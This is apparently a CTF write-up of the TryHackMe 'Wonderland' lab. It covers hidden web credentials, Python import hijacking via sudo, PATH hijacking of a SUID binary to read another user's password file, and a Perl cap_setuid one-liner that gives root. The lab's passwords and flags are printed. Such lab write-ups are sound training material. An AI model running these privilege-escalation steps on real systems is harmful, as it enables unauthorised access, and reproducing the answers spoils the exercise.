Back to CTF Writeups

Wonderland — TryHackMe CTF

Alice-in-Wonderland themed box with reversed flag locations. Python library hijacking via sudo, PATH hijacking on SUID binary, and Perl cap_setuid capability for root. 2 flags.

TryHackMeMediumMar 20260xb0rn3 | oxbv1

Overview

Everything is reversed — user.txt is in /root, root.txt is in /home/alice. The attack chain involves hidden web credentials, three distinct privilege escalation stages: Python library hijacking, PATH hijacking on a SUID binary, and Linux capabilities on Perl.

/r/a/b/b/i/t → Hidden creds (alice) → SSH → Python import hijack (sudo as rabbit) → PATH hijack on teaParty SUID (rabbit → hatter) → Perl cap_setuid (hatter → root)

Foothold

Web server hint: "Follow the white rabbit." Navigating to /r/a/b/b/i/t reveals hidden credentials in page source:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

SSH as alice. user.txt is in /root (readable by alice — intentional reversal).

USER: thm{"Curiouser and curiouser!"}

Alice → Rabbit (Python Import Hijack)

sudo -l  # (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

The script does import random. Python checks current directory first — create /home/alice/random.py with malicious code, run via sudo as rabbit.

Rabbit → Hatter (PATH Hijack)

/home/rabbit/teaParty is SUID. ltrace shows it calls system("... date") with date as a relative path. Create /tmp/date (malicious), prepend /tmp to PATH. The binary drops to hatter (uid 1003) before calling system().

# /tmp/date reads hatter's password
cat /home/hatter/password.txt > /tmp/hatter_pass.txt
# password: WhyIsARavenLikeAWritingDesk?

Hatter → Root (Perl cap_setuid)

getcap -r / 2>/dev/null
# /usr/bin/perl = cap_setuid+ep

Perl with cap_setuid can set UID to 0:

perl -e 'use POSIX qw(setuid); POSIX::setuid(0);
  exec "/bin/bash -c \"cat /home/alice/root.txt\""'
ROOT: thm{Twinkle, twinkle, little bat! How I wonder what you're at!}

Lessons Learned

  1. Python import hijacking: current directory is sys.path[0]. Any import in a sudo-run script can be hijacked.
  2. PATH hijacking: SUID binaries calling system() with relative commands are vulnerable when we control PATH.
  3. Linux capabilities: cap_setuid+ep on interpreters (Perl/Python/Ruby) = trivial root. Always check getcap -r /.
  4. Hidden HTML content: display:none elements often contain secrets.